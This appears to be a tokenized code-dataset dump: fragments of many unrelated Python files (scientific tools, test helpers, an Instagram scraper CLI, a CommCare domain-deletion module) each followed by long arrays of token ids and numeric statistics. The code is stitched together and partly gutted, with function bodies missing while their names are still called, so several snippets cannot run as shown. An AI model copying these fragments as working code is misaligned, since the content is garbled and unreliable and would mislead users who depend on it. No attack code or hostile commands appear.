[ 37811, 198, 220, 1374, 284, 900, 510, 7166, 2858, 198, 220, 220, 220, 7347, 2721, 7166, 24330, 198, 220, 220, 220, 7347, 2721, 7166, 24330, 48553, 628, 220, 1303, 10784, 30936, 1340, 62, 39069, 31820, 14, 4834, 14259, 198, 220, 2723, ...
3.212963
216
from SemiBin.main import generate_data_single import os import pytest import logging import pandas as pd
[ 6738, 35525, 33, 259, 13, 12417, 1330, 7716, 62, 7890, 62, 29762, 198, 11748, 28686, 198, 11748, 12972, 9288, 198, 11748, 18931, 198, 11748, 19798, 292, 355, 279, 67 ]
3.586207
29
# Copyright 2020 - The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for create.""" import unittest from unittest import mock from acloud import errors from acloud.create import create_args from acloud.internal import constants from acloud.internal.lib import driver_test_lib def _CreateArgs(): """set default pass in arguments.""" mock_args = mock.MagicMock( flavor=None, num=1, adb_port=None, hw_property=None, stable_cheeps_host_image_name=None, stable_cheeps_host_image_project=None, username=None, password=None, cheeps_betty_image=None, local_image=None, local_kernel_image=None, local_system_image=None, system_branch=None, system_build_id=None, system_build_target=None, local_instance=None, remote_host=None, host_user=constants.GCE_USER, host_ssh_private_key_path=None, avd_type=constants.TYPE_CF, autoconnect=constants.INS_KEY_VNC) return mock_args # pylint: disable=invalid-name,protected-access if __name__ == "__main__": unittest.main()
[ 2, 15069, 12131, 532, 383, 5565, 4946, 8090, 4935, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, ...
2.65142
634
#!/usr/bin/env python # -*- coding: utf-8 -*- import sys from cx_Freeze import setup,Executable icondata='icon.ico' base = None # GUI=, CUI= if sys.platform == 'win32' : base = 'win32GUI' exe = Executable(script = 'main.py', base = base, #icon=icondata ) setup(name = 'MSman', version = '0.1', description = 'Minecraft Server Manager', executables = [exe] )
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 25064, 198, 6738, 43213, 62, 11146, 2736, 1330, 9058, 11, 23002, 18187, 198, 198, 291, 623, 1045, 11639, 47...
2.079439
214
from __future__ import annotations from threading import Lock from typing import List, Set, Optional, Any, Tuple from stereotype.utils import ConfigurationError _roles: List[Role] = [] _roles_lock = Lock() DEFAULT_ROLE = Role('default')
[ 6738, 11593, 37443, 834, 1330, 37647, 198, 198, 6738, 4704, 278, 1330, 13656, 198, 6738, 19720, 1330, 7343, 11, 5345, 11, 32233, 11, 4377, 11, 309, 29291, 198, 198, 6738, 31240, 13, 26791, 1330, 28373, 12331, 628, 198, 198, 62, 305, 8...
3.402778
72
# coding:utf-8 ''' VSWR 10marker ''' import os import logging from commoninterface.zvlbase import ZVLBase logger = logging.getLogger('ghost')
[ 2, 19617, 25, 40477, 12, 23, 198, 7061, 6, 198, 53, 17887, 49, 198, 940, 4102, 263, 198, 7061, 6, 198, 11748, 28686, 198, 11748, 18931, 198, 6738, 2219, 39994, 13, 89, 19279, 8692, 1330, 1168, 47468, 14881, 198, 198, 6404, 1362, 796...
2.769231
52
from __future__ import division import numpy as np import matplotlib.pyplot as plt import shellmodelutilities as smutil # Set bin width and range bin_width = 0.20 Emax = 14 Nbins = int(np.ceil(Emax/bin_width)) Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins bins = np.linspace(0,Emax_adjusted,Nbins+1) # Define list of calculation input files and corresponding label names inputfile = "summary_Zn70_jun45.txt" # Instantiate figure which we will fill f_rho, ax_rho = plt.subplots(1,1) # Read energy levels from file levels = smutil.read_energy_levels(inputfile) # Choose which [2*J,pi] combinations to include in partial level density plot Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1], [0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]] # Allocate (Ex,Jpi) matrix to store partial level density rho_ExJpi = np.zeros((Nbins,len(Jpi_list))) # Count number of levels for each (Ex, J, pi) pixel. Egs = levels[0,0] # Ground state energy for i_l in range(len(levels[:,0])): E, J, pi = levels[i_l] # Skip if level is outside range: if E-Egs >= Emax: continue i_Ex = int(np.floor((E-Egs)/bin_width)) try: i_Jpi = Jpi_list.index([J,pi]) except: continue rho_ExJpi[i_Ex,i_Jpi] += 1 rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1 # Plot it from matplotlib.colors import LogNorm # To get log scaling on the z axis colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm()) f_rho.colorbar(colorbar_object) # Add colorbar to plot # Make the plot nice ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$") ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$') # A bit of Python voodoo to get the x labels right: Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot ax_rho.set_xlim([0,29]) ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func)) ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27]) # Show plot plt.show()
[ 6738, 11593, 37443, 834, 1330, 7297, 198, 11748, 299, 32152, 355, 45941, 220, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 220, 198, 11748, 7582, 19849, 315, 2410, 355, 895, 22602, 628, 198, 198, 2, 5345, 9874, 9647, ...
2.279678
994
import abc import secrets from collections.abc import AsyncIterator, Awaitable, Callable, Mapping from contextlib import AbstractAsyncContextManager, asynccontextmanager from dataclasses import dataclass from datetime import datetime, timezone import pytest from aiohttp import ClientSession from yarl import URL from platform_buckets_api.providers import ( BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations, ) from platform_buckets_api.storage import ImportedBucket, ProviderBucket BUCKET_NAME_PREFIX = "integration-tests-" ROLE_NAME_PREFIX = "integration-tests-" def as_admin_cm( creator_func: Callable[[ProviderBucket], BasicBucketClient] ) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]: return creator # Access checkers class TestProviderBase: __test__ = False
[ 11748, 450, 66, 198, 11748, 13141, 198, 6738, 17268, 13, 39305, 1330, 1081, 13361, 37787, 11, 5851, 4548, 540, 11, 4889, 540, 11, 337, 5912, 198, 6738, 4732, 8019, 1330, 27741, 42367, 21947, 13511, 11, 355, 2047, 535, 261, 5239, 37153, ...
3.214789
284
# Licensed under a 3-clause BSD style license - see LICENSE.rst """ sbpy bandpass Module """ __all__ = [ 'bandpass' ] import os from astropy.utils.data import get_pkg_data_filename def bandpass(name): """Retrieve bandpass transmission spectrum from sbpy. Parameters ---------- name : string Name of the bandpass, case insensitive. See notes for available filters. Returns ------- bp : `~synphot.SpectralElement` Notes ----- Available filters: +-------------+---------------------------+ | Name | Source | +=============+===========================+ | 2MASS J | Cohen et al. 2003 | +-------------+---------------------------+ | 2MASS H | Cohen et al. 2003 | +-------------+---------------------------+ | 2MASS Ks | Cohen et al. 2003 | +-------------+---------------------------+ | Cousins R | STScI CDBS, v4 | +-------------+---------------------------+ | Cousins I | STScI CDBS, v4 | +-------------+---------------------------+ | Johnson U | STScI CDBS, v4 | +-------------+---------------------------+ | Johnson B | STScI CDBS, v4 | +-------------+---------------------------+ | Johnson V | STScI CDBS, v4 | +-------------+---------------------------+ | PS1 g | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 r | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 i | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 w | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 y | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 z | Tonry et al. 2012 | +-------------+---------------------------+ | SDSS u | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS g | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS r | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS i | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS z | SDSS, dated 2001 | +-------------+---------------------------+ | WFC3 F438W | HST/WFC3 UVIS, v4 | +-------------+---------------------------+ | WFC3 F606W | HST/WFC3 UVIS, v4 | +-------------+---------------------------+ | WISE W1 | Jarrett et al. 2011 | +-------------+---------------------------+ | WISE W2 | Jarrett et al. 2011 | +-------------+---------------------------+ | WISE W3 | Jarrett et al. 2011 | +-------------+---------------------------+ | WISE W4 | Jarrett et al. 2011 | +-------------+---------------------------+ References ---------- .. [CDBS] Space Telescope Science Institute. HST Calibration Reference Data System. https://hst-crds.stsci.edu/ . .. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ 126, 1090. .. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of the Ecliptic Poles. ApJ 735, 112. .. [SDSS] Sloan Digital Sky Survey. Camera. www.sdss.org/instruments/camera . .. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric System. ApJ 750, 99. """ try: import synphot except ImportError: raise ImportError('synphot is required.') name2file = { '2mass j': '2mass-j-rsr.txt', '2mass h': '2mass-h-rsr.txt', '2mass ks': '2mass-ks-rsr.txt', 'cousins r': 'cousins_r_004_syn.fits', 'cousins i': 'cousins_i_004_syn.fits', 'johnson u': 'johnson_u_004_syn.fits', 'johnson b': 'johnson_b_004_syn.fits', 'johnson v': 'johnson_v_004_syn.fits', 'ps1 g': 'ps1-gp1.txt', 'ps1 r': 'ps1-rp1.txt', 'ps1 i': 'ps1-ip1.txt', 'ps1 w': 'ps1-wp1.txt', 'ps1 y': 'ps1-yp1.txt', 'ps1 z': 'ps1-zp1.txt', 'sdss u': 'sdss-u.fits', 'sdss g': 'sdss-g.fits', 'sdss r': 'sdss-r.fits', 'sdss i': 'sdss-i.fits', 'sdss z': 'sdss-z.fits', 'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits', 'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits', 'wise w1': 'WISE-RSR-W1.EE.txt', 'wise w2': 'WISE-RSR-W2.EE.txt', 'wise w3': 'WISE-RSR-W3.EE.txt', 'wise w4': 'WISE-RSR-W4.EE.txt', } fn = get_pkg_data_filename(os.path.join( '..', 'photometry', 'data', name2file[name.lower()])) bp = synphot.SpectralElement.from_file(fn) return bp
[ 2, 49962, 739, 257, 513, 12, 565, 682, 347, 10305, 3918, 5964, 532, 766, 38559, 24290, 13, 81, 301, 198, 37811, 198, 36299, 9078, 4097, 6603, 19937, 198, 198, 37811, 198, 198, 834, 439, 834, 796, 685, 198, 220, 220, 220, 705, 3903, ...
2.21076
2,249
from django.http import HttpResponse from django.shortcuts import render, redirect from community.models import Community # Create your views here.
[ 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 31077, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 8543, 11, 18941, 198, 6738, 2055, 13, 27530, 1330, 8108, 628, 198, 2, 13610, 534, 5009, 994, 13, 628, 628 ]
4.135135
37
# Generated by Django 3.1.2 on 2020-10-18 17:19 from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 16, 13, 17, 319, 12131, 12, 940, 12, 1507, 1596, 25, 1129, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
# OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device # Copyright (c) 2017 QuTech (Delft) # Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__ # # Pieter Eendebak <pieter.eendebak@tno.nl>, 2017 # Takafumi Fujita <t.fujita@tudelft.nl>, 2016 # Guenevere Prawiroatmodjo <guen@vvtp.tudelft.nl>, 2009 # Pieter de Groot <pieterdegroot@gmail.com>, 2009 from time import sleep import visa import logging from qcodes import VisaInstrument
[ 2, 13643, 818, 2536, 2886, 62, 4146, 44, 2167, 13, 9078, 1398, 11, 284, 1620, 262, 6946, 1022, 262, 27323, 2848, 290, 262, 3335, 198, 2, 15069, 357, 66, 8, 2177, 2264, 17760, 357, 13856, 701, 8, 198, 2, 6127, 318, 1695, 739, 262, ...
2.983516
182
import numpy as np import matplotlib.pyplot as plt import pickle """ The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000 training images and 10000 test images. The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random order, but some training batches may contain more images from one class than another. Between them, the training batches contain exactly 5000 images from each class. """ def unpickle(file): """load the cifar-10 data""" with open(file, 'rb') as fo: data = pickle.load(fo, encoding='bytes') return data def load_cifar_10_data(data_dir, negatives=False): """ Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels """ # get the meta_data_dict # num_cases_per_batch: 1000 # label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] # num_vis: :3072 meta_data_dict = unpickle(data_dir + "/batches.meta") cifar_label_names = meta_data_dict[b'label_names'] cifar_label_names = np.array(cifar_label_names) # training data cifar_train_data = None cifar_train_filenames = [] cifar_train_labels = [] # cifar_train_data_dict # 'batch_label': 'training batch 5 of 5' # 'data': ndarray # 'filenames': list # 'labels': list for i in range(1, 6): cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i)) if i == 1: cifar_train_data = cifar_train_data_dict[b'data'] else: cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data'])) cifar_train_filenames += cifar_train_data_dict[b'filenames'] cifar_train_labels += cifar_train_data_dict[b'labels'] cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32)) if negatives: cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32) else: cifar_train_data = np.rollaxis(cifar_train_data, 1, 4) cifar_train_filenames = np.array(cifar_train_filenames) cifar_train_labels = np.array(cifar_train_labels) # test data # cifar_test_data_dict # 'batch_label': 'testing batch 1 of 1' # 'data': ndarray # 'filenames': list # 'labels': list cifar_test_data_dict = unpickle(data_dir + "/test_batch") cifar_test_data = cifar_test_data_dict[b'data'] cifar_test_filenames = cifar_test_data_dict[b'filenames'] cifar_test_labels = cifar_test_data_dict[b'labels'] cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32)) if negatives: cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32) else: cifar_test_data = np.rollaxis(cifar_test_data, 1, 4) cifar_test_filenames = np.array(cifar_test_filenames) cifar_test_labels = np.array(cifar_test_labels) return cifar_train_data, cifar_train_filenames, cifar_train_labels, \ cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names if __name__ == "__main__": """show it works""" cifar_10_dir = '.\cifar10-dataset' train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \ load_cifar_10_data(cifar_10_dir) print("Train data: ", train_data.shape) print("Train filenames: ", train_filenames.shape) print("Train labels: ", train_labels.shape) print("Test data: ", test_data.shape) print("Test filenames: ", test_filenames.shape) print("Test labels: ", test_labels.shape) print("Label names: ", label_names.shape) # Don't forget that the label_names and filesnames are in binary and need conversion if used. # display some random training images in a 25x25 grid num_plot = 5 f, ax = plt.subplots(num_plot, num_plot) for m in range(num_plot): for n in range(num_plot): idx = np.random.randint(0, train_data.shape[0]) ax[m, n].imshow(train_data[idx]) ax[m, n].get_xaxis().set_visible(False) ax[m, n].get_yaxis().set_visible(False) f.subplots_adjust(hspace=0.1) f.subplots_adjust(wspace=0) plt.show()
[ 11748, 299, 32152, 355, 45941, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 2298, 293, 198, 198, 37811, 198, 464, 327, 5064, 1503, 12, 940, 27039, 10874, 286, 718, 2388, 3933, 87, 2624, 9568, 4263, 287, 83...
2.353223
1,877
# This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0 # which is available at https://www.volatilityfoundation.org/license/vsl-v1.0 # """A module containing a collection of plugins that produce data typically found in Mac's lsmod command.""" from volatility3.framework import renderers, interfaces, contexts from volatility3.framework.configuration import requirements from volatility3.framework.interfaces import plugins from volatility3.framework.objects import utility from volatility3.framework.renderers import format_hints
[ 2, 770, 2393, 318, 15069, 13130, 4709, 18486, 5693, 290, 11971, 739, 262, 4709, 18486, 10442, 13789, 352, 13, 15, 198, 2, 543, 318, 1695, 379, 3740, 1378, 2503, 13, 10396, 18486, 42526, 13, 2398, 14, 43085, 14, 85, 6649, 12, 85, 16,...
4.484615
130
''' instahunter.py Author: Araekiel Copyright: Copyright 2019, Araekiel License: MIT Version: 1.6.3 ''' import click import requests import json from datetime import datetime headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"} cli.add_command(getposts) cli.add_command(getuser) cli.add_command(getuserposts) cli.add_command(search) if __name__ == "__main__": cli()
[ 7061, 6, 198, 220, 220, 220, 916, 993, 403, 353, 13, 9078, 628, 220, 220, 220, 6434, 25, 30574, 988, 8207, 198, 220, 220, 220, 15069, 25, 220, 15069, 220, 13130, 11, 30574, 988, 8207, 198, 220, 220, 220, 13789, 25, 17168, 198, 220...
2.5
184
#!/usr/bin/env python # Copyright 2014-2019 The PySCF Developers. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Author: Qiming Sun <osirpt.sun@gmail.com> # ''' Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling (In testing) Refs: J. Phys. Chem. A. 114, 9246, 2010 Mole. Phys. 9, 6, 585, 1964 ''' from functools import reduce import numpy, sys from pyscf import lib from pyscf.lib import logger from pyscf.dft import numint from pyscf.prop.nmr import uks as uks_nmr from pyscf.prop.esr import uhf as uhf_esr from pyscf.prop.esr.uhf import _write, align from pyscf.data import nist from pyscf.grad import rks as rks_grad # Note mo10 is the imaginary part of MO^1 # Treat Vxc as one-particle operator Vnuc # Jia, start to work here if __name__ == '__main__': from pyscf import gto, scf mol = gto.M(atom='H 0 0.1 0; H 0 0 1.', basis='ccpvdz', spin=1, charge=-1, verbose=3) mf = scf.UKS(mol).set(xc='bp86').run() esr_obj = ESR(mf) esr_obj.gauge_orig = (0,0,0) esr_obj.para_soc2e = False esr_obj.so_eff_charge = True print(esr_obj.kernel()) mol = gto.M(atom=''' H 0 0 1 H 1.2 0 1 H .1 1.1 0.3 H .8 .7 .6 ''', basis='ccpvdz', spin=1, charge=1, verbose=3) mf = scf.UKS(mol).set(xc='bp86').run() gobj = GTensor(mf) #print(gobj.kernel()) gobj.para_soc2e = 'SSO' gobj.dia_soc2e = None gobj.so_eff_charge = False nao, nmo = mf.mo_coeff[0].shape nelec = mol.nelec numpy.random.seed(1) mo10 =[numpy.random.random((3,nmo,nelec[0])), numpy.random.random((3,nmo,nelec[1]))] print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05) numpy.random.seed(1) dm0 = numpy.random.random((2,nao,nao)) dm0 = dm0 + dm0.transpose(0,2,1) dm10 = numpy.random.random((2,3,nao,nao)) dm10 = dm10 - dm10.transpose(0,1,3,2) print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 15069, 1946, 12, 23344, 383, 9485, 6173, 37, 34152, 13, 1439, 6923, 33876, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341,...
2.184343
1,188
import random import magent from magent.builtin.rule_model import RandomActor import numpy as np if __name__ == "__main__": gw = magent.gridworld cfg = gw.Config() map_size = 25 cfg.set({"map_width": map_size, "map_height": map_size}) agent_group = cfg.add_group( cfg.register_agent_type( name="agent", attr={ 'width': 1, 'length': 1, 'view_range': gw.CircleRange(4), 'can_gather': True})) food_group = cfg.add_group( cfg.register_agent_type( "food", attr={'width': 1, 'length': 1, 'can_be_gathered': True})) # add reward rule a = gw.AgentSymbol(agent_group, index='any') b = gw.AgentSymbol(food_group, index='any') e = gw.Event(a, 'collide', b) cfg.add_reward_rule(e, receiver=a, value=1) # cfg.add_reward_rule(e2, receiver=b, value=1, die=True) # cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1]) env = magent.GridWorld(cfg) agent_handle, food_handle = env.get_handles() model1 = RandomActor(env, agent_handle, "up") env.set_render_dir("build/render") env.reset() upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2), (map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2), (map_size//2 + 2, map_size//2 + 2)] # spawnrate = 0.1 env.add_agents(agent_handle, method="custom", pos=upstart) # env.add_agents(rightgroup, method="custom", pos=rightstart) init_food(env, food_handle) k = env.get_observation(agent_handle) print env.get_pos(agent_handle) print len(env.get_pos(food_handle)) done = False step_ct = 0 r_sum = 0 while not done: obs_1 = env.get_observation(agent_handle) ids_1 = env.get_agent_id(agent_handle) acts_1 = model1.infer_action(obs_1, ids_1) env.set_action(agent_handle, acts_1) # simulate one step done = env.step() # render env.render() # get reward reward = sum(env.get_reward(agent_handle)) r_sum += reward # clear dead agents env.clear_dead() neigbor_regen_food(env, food_handle) # print info # if step_ct % 10 == 0: # print("step %d" % step_ct) step_ct += 1 if step_ct > 250: break print r_sum
[ 11748, 4738, 198, 11748, 2153, 298, 198, 6738, 2153, 298, 13, 18780, 259, 13, 25135, 62, 19849, 1330, 14534, 40277, 198, 11748, 299, 32152, 355, 45941, 628, 198, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, ...
2.023102
1,212
import itertools import logging from datetime import date from django.apps import apps from django.conf import settings from django.db import connection, transaction from django.db.models import Q from dimagi.utils.chunked import chunked from corehq.apps.accounting.models import Subscription from corehq.apps.accounting.utils import get_change_status from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type from corehq.apps.domain.utils import silence_during_tests from corehq.apps.locations.views import LocationFieldsView from corehq.apps.products.views import ProductFieldsView from corehq.apps.userreports.dbaccessors import ( delete_all_ucr_tables_for_domain, ) from corehq.apps.users.views.mobile import UserFieldsView from corehq.blobs import CODES, get_blob_db from corehq.blobs.models import BlobMeta from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state from corehq.form_processor.interfaces.dbaccessors import ( CaseAccessors, FormAccessors, ) from corehq.util.log import with_progress_bar logger = logging.getLogger(__name__) def _delete_domain_backend_mappings(domain_name): model = apps.get_model('sms', 'SQLMobileBackendMapping') model.objects.filter(is_global=False, domain=domain_name).delete() def _delete_domain_backends(domain_name): model = apps.get_model('sms', 'SQLMobileBackend') model.objects.filter(is_global=False, domain=domain_name).delete() def _delete_web_user_membership(domain_name): from corehq.apps.users.models import WebUser active_web_users = WebUser.by_domain(domain_name) inactive_web_users = WebUser.by_domain(domain_name, is_active=False) for web_user in list(active_web_users) + list(inactive_web_users): web_user.delete_domain_membership(domain_name) if settings.UNIT_TESTING and not web_user.domain_memberships: web_user.delete() else: web_user.save() # We use raw queries instead of ORM because Django queryset delete needs to # fetch objects into memory to send signals and handle cascades. It makes deletion very slow # if we have a millions of rows in stock data tables. DOMAIN_DELETE_OPERATIONS = [ RawDeletion('stock', """ DELETE FROM stock_stocktransaction WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s) """), RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"), RawDeletion('stock', """ DELETE FROM commtrack_stockstate WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s) """), ModelDeletion('products', 'SQLProduct', 'domain'), ModelDeletion('locations', 'SQLLocation', 'domain'), ModelDeletion('locations', 'LocationType', 'domain'), ModelDeletion('stock', 'DocDomainMapping', 'domain_name'), ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'), ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'), ModelDeletion('sms', 'SMS', 'domain'), ModelDeletion('sms', 'SQLLastReadMessage', 'domain'), ModelDeletion('sms', 'ExpectedCallback', 'domain'), ModelDeletion('ivr', 'Call', 'domain'), ModelDeletion('sms', 'Keyword', 'domain'), ModelDeletion('sms', 'PhoneNumber', 'domain'), ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'), ModelDeletion('sms', 'MessagingEvent', 'domain'), ModelDeletion('sms', 'QueuedSMS', 'domain'), ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'), CustomDeletion('sms', _delete_domain_backend_mappings), ModelDeletion('sms', 'MobileBackendInvitation', 'domain'), CustomDeletion('sms', _delete_domain_backends), CustomDeletion('users', _delete_web_user_membership), CustomDeletion('accounting', _terminate_subscriptions), CustomDeletion('form_processor', _delete_all_cases), CustomDeletion('form_processor', _delete_all_forms), ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'), ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'), ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'), ModelDeletion('app_manager', 'ResourceOverride', 'domain'), ModelDeletion('app_manager', 'GlobalAppConfig', 'domain'), ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'), ModelDeletion('case_search', 'CaseSearchConfig', 'domain'), ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'), ModelDeletion('case_search', 'FuzzyProperties', 'domain'), ModelDeletion('case_search', 'IgnorePatterns', 'domain'), ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'), ModelDeletion('consumption', 'DefaultConsumption', 'domain'), ModelDeletion('data_analytics', 'GIRRow', 'domain_name'), ModelDeletion('data_analytics', 'MALTRow', 'domain_name'), ModelDeletion('data_dictionary', 'CaseType', 'domain'), ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'), ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'), ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'), ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'), ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'), ModelDeletion('domain', 'TransferDomainRequest', 'domain'), ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'), CustomDeletion('export', _delete_data_files), ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'), ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'), ModelDeletion('ota', 'SerialIdBucket', 'domain'), ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'), ModelDeletion('phone', 'SyncLogSQL', 'domain'), ModelDeletion('registration', 'RegistrationRequest', 'domain'), ModelDeletion('reminders', 'EmailUsage', 'domain'), ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'), ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'), ModelDeletion('translations', 'SMSTranslations', 'domain'), ModelDeletion('translations', 'TransifexBlacklist', 'domain'), ModelDeletion('userreports', 'AsyncIndicator', 'domain'), ModelDeletion('users', 'DomainRequest', 'domain'), ModelDeletion('users', 'Invitation', 'domain'), ModelDeletion('users', 'DomainPermissionsMirror', 'source'), ModelDeletion('zapier', 'ZapierSubscription', 'domain'), ModelDeletion('dhis2', 'Dhis2Connection', 'domain'), ModelDeletion('motech', 'RequestLog', 'domain'), ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'), CustomDeletion('custom_data_fields', _delete_custom_data_fields), CustomDeletion('ucr', delete_all_ucr_tables_for_domain), ]
[ 11748, 340, 861, 10141, 198, 11748, 18931, 198, 6738, 4818, 8079, 1330, 3128, 198, 198, 6738, 42625, 14208, 13, 18211, 1330, 6725, 198, 6738, 42625, 14208, 13, 10414, 1330, 6460, 198, 6738, 42625, 14208, 13, 9945, 1330, 4637, 11, 8611, ...
2.894247
2,364
